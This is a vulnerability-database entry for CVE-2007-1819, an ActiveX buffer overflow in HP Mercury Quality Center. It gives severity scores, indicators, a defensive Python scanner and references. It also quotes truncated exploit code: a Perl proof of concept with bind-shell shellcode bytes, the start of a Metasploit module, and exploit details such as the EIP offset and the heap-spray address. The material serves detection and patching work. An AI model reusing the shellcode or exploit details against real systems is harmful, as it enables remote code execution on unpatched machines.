CVE-2007-1819
Published 2007-04-02
Priority: P258 · Severity: critical · CVSS 2.0 base score: 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit available
EPSS: 39.73% (98.4th percentile)
Stack-based buffer overflow in the SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 in TestDirector (TD) for Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32, allows remote attackers to execute arbitrary code via a long ProgColor property.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | mercury_quality_center | — | — |
| hp | mercury_quality_center | — | — |
Detection & IOCs (extracted from sources)
- bytes: `\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45`
- Detect instantiation of the vulnerable SPIDERLib.Loader ActiveX control (CLSID associated with Spider90.ocx) in browser content, particularly when the ProgColor property is set to an abnormally long string.
- Look for heap spray patterns using the 0x0C0C0C0C address in JavaScript (repeated %u0C0C%u0C0C unescape sequences) delivered alongside ActiveX object instantiation.
- Payload bad characters for this exploit are null byte, tab, LF, CR, single-quote, and backslash; shellcode delivered via unescape() will avoid these bytes.
- The exploit buffer offset to EIP is 64 bytes; a stack-based overflow with exactly 64 bytes of padding before the return address is a strong indicator of this specific exploit.
- The Metasploit module targets Windows XP SP0-SP3 and Windows Vista SP0-SP1 with IE 6.0 SP0-2 and IE 7.0 only; the heap spray and return address (0x0C0C0C0C) are specific to these platform/browser combinations.
- The StackAdjustment of -3500 is used by the Metasploit payload to avoid clobbering itself on the stack; this is exploit-framework-specific and may differ in custom exploit variants.
- The POC shellcode (EDB-3661) opens a bind shell on port 5555; real-world attackers will substitute different payloads, so port 5555 alone is not a reliable indicator.
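As an added defender-side example (not from the page's sources or from any of the exploit modules listed), a small Python scanner that checks captured web content for the indicators above: a reference to the SPIDERLib.Loader control, a ProgColor value at or beyond the 64-byte EIP offset, and runs of %u0C0C unescape sequences. The two sample documents and the thresholds are constructed assumptions.

```python
import re

# Indicators taken from the IOC list above; the thresholds are assumptions for this example.
CONTROL_RE = re.compile(r"SPIDERLib\.Loader|Spider90\.ocx", re.IGNORECASE)
# ProgColor set via an <object> <param> tag or via a script property assignment
PARAM_RE = re.compile(r'''<param\s+name\s*=\s*["']ProgColor["']\s+value\s*=\s*["']([^"']*)["']''', re.IGNORECASE)
ASSIGN_RE = re.compile(r'''\.ProgColor\s*=\s*["']([^"']*)["']''', re.IGNORECASE)
# two or more consecutive %u0c0c words: the repeated-unescape heap spray pattern
SPRAY_RE = re.compile(r"(?:%u0c0c){2,}", re.IGNORECASE)

PROGCOLOR_MAX = 64  # EIP offset reported for this bug; no colour value needs this length


def scan_html(content: str) -> dict:
    """Return indicator hits for one captured HTML/JS document."""
    values = PARAM_RE.findall(content) + ASSIGN_RE.findall(content)
    longest = max((len(v) for v in values), default=0)
    hits = {
        "control_referenced": bool(CONTROL_RE.search(content)),
        "longest_progcolor": longest,
        "long_progcolor": longest >= PROGCOLOR_MAX,
        "heap_spray_runs": len(SPRAY_RE.findall(content)),
    }
    # Flag only when the vulnerable control is present together with an attack indicator,
    # so ordinary Quality Center pages that set a normal colour are not reported.
    hits["suspicious"] = hits["control_referenced"] and (
        hits["long_progcolor"] or hits["heap_spray_runs"] > 0
    )
    return hits


# Constructed samples (not real captures): a normal use of the control and a hostile page.
BENIGN_SAMPLE = (
    '<script>var ldr = new ActiveXObject("SPIDERLib.Loader");'
    ' ldr.ProgColor = "#336699";</script>'
)
SUSPICIOUS_SAMPLE = (
    '<script>var ldr = new ActiveXObject("SPIDERLib.Loader");'
    ' var fill = unescape("%u0c0c%u0c0c");'
    ' ldr.ProgColor = "' + "A" * 128 + '";</script>'
)

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        print(name, scan_html(doc))
```

Run it over proxy captures or a web-content sandbox export; a hit on `suspicious` is a reason to pull the full document for review, not a confirmation by itself.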
No detection rules found.
Exploit-DB: HP Mercury Quality Center - ActiveX Control ProgColor Buffer Overflow (Metasploit), published 2010-04-30
---
```ruby
##
# $Id: hpmqc_progcolor.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # NOTE: the mixin includes and the opening of initialize were dropped when this
  # excerpt was extracted; only the standard Metasploit3 scaffolding is restored here,
  # and the excerpt ends where the indexed source ends.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in SPIDERLib.Loader
        ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD)
        for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and
        8.2 SP1 before Patch 32.

        By setting an over
```
Exploit-DB: HP Mercury Quality Center - Spider90.ocx ProgColor Overflow, published 2007-04-04
---
```perl
#!/usr/bin/perl
# POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow
# credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the
# metasploit crew. This exploit is just a cut and paste of their code; they
# deserve the credit
# Vulnerability found by Titon and Ri0t of Bastardlabs
use strict;

# win32_bind LPORT = 5555 - Metasploit
# (the shellcode and the rest of the script are truncated in the indexed source)
my $shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
"\xc3\x31\xdb\
```
Metasploit: HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
This module exploits a stack-based buffer overflow in SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. By setting an overly long value to 'ProgColor', an attacker can overrun a buffer and execute arbitrary code.
No writeups or analysis indexed.
References
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00901872
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=497
- http://secunia.com/advisories/24692
- http://securitytracker.com/id?1017835
- http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/7a0f7f0efc7905fdc225729f004cf387?OpenDocument
- http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/cf109e434c7765eac22572a4006c6e94?OpenDocument
- http://www.kb.cert.org/vuls/id/589097
- http://www.securityfocus.com/bid/23239
- http://www.vupen.com/english/advisories/2007/1185
- https://exchange.xforce.ibmcloud.com/vulnerabilities/33353